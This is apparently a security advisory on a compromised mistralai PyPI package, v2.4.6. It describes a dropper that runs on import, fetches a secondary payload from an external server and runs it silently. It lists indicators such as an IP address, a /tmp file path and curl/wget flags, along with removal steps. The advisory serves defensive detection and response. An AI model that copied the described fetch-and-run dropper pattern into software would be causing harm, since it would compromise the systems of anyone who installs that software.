Supply Chain Compromise: Malicious Dropper in mistralai PyPI Package v2.4.6

Vulnerability Description

This is a supply chain compromise involving unauthorized package tampering. The mistralai PyPI package v2.4.6 contains injected malicious code that executes at module load time, before any user code runs. The vulnerability class is arbitrary code execution via dependency injection. The root cause is unauthorized access to the PyPI upload mechanism—the attacker bypassed the repository's PyPI Trusted Publishing workflow, indicating either credential compromise, account takeover, or PyPI infrastructure exploitation. The impact is severe: any system importing mistralai==2.4.6 automatically executes attacker-controlled code with the privileges of the importing process.

Proof-of-Concept Significance

This PoC is significant because it demonstrates a fully realized, in-the-wild supply chain attack rather than a theoretical vulnerability. The malicious code uses obfuscated imports and conditional execution (Linux-only, environment variable gating) to evade casual inspection. The dropper fetches a secondary payload (transformers.pyz) from an external C2 server and executes it asynchronously in a new session, designed for stealth. Preconditions are minimal: any Python environment that installed this exact version and imported the package is compromised. The attack is reliable and deterministic.

Detection Guidance

Package-level indicators:

• Scan pip freeze/requirements outputs for mistralai==2.4.6; use pip show mistralai to confirm installed version
• Query PyPI API or use tools like safety to flag this CVE-less advisory
• Monitor pip logs for mistralai package installations around the compromise window

Runtime indicators:

• File creation in /tmp/transformers.pyz on Linux systems
• Process spawning of python /tmp/transformers.pyz with DEVNULL redirects (suspicious backgrounding)
• Outbound HTTPS connections to 83.142.209.194 on port 443
• Environment variable MISTRAL_INIT=1 set in child process environments
• curl or wget subprocesses with -k (insecure SSL) and -L (follow redirects) flags

Logs to monitor:

• Application stderr/stdout for import errors (malformed code may cause exceptions)
• System auditd logs for file access to /tmp/transformers.pyz
• Network logs for DNS/TLS to 83.142.209.194 (may be sinkholed)

Mitigation Steps

1. Immediate: Uninstall mistralai==2.4.6 from all environments: pip uninstall mistralai==2.4.6 -y
2. Verify: Downgrade to mistralai==2.4.5 or earlier; confirm via pip show mistralai
3. Isolation: Quarantine or rebuild any system that imported the malicious version; review process logs for secondary payload execution
4. Remediation: Kill any lingering python /tmp/transformers.pyz processes; delete /tmp/transformers.pyz if present
5. Scanning: Run full system antivirus/EDR scans on affected hosts; check for persistence mechanisms
6. Future prevention: Enforce pip dependency pinning, use pip-audit or safety in CI/CD, restrict outbound HTTPS to known-good hosts, and audit PyPI account access logs

Risk Assessment

Likelihood of exploitation: Very high. This is an active, confirmed breach affecting all users of v2.4.6. The package is quarantined but may already be downloaded/cached. Threat actors likely have a distribution list of affected systems.

Threat actor interest: Critical. Supply chain attacks on widely-used ML/AI packages (mistralai has significant adoption) are highly valued. This attack pattern (dropper → secondary payload) is consistent with APT tradecraft, suggesting organized threat activity rather than opportunistic abuse. The use of HTTPS C2, session isolation, and conditional execution indicates operational sophistication. Organizations using mistralai in production are at immediate risk of full system compromise.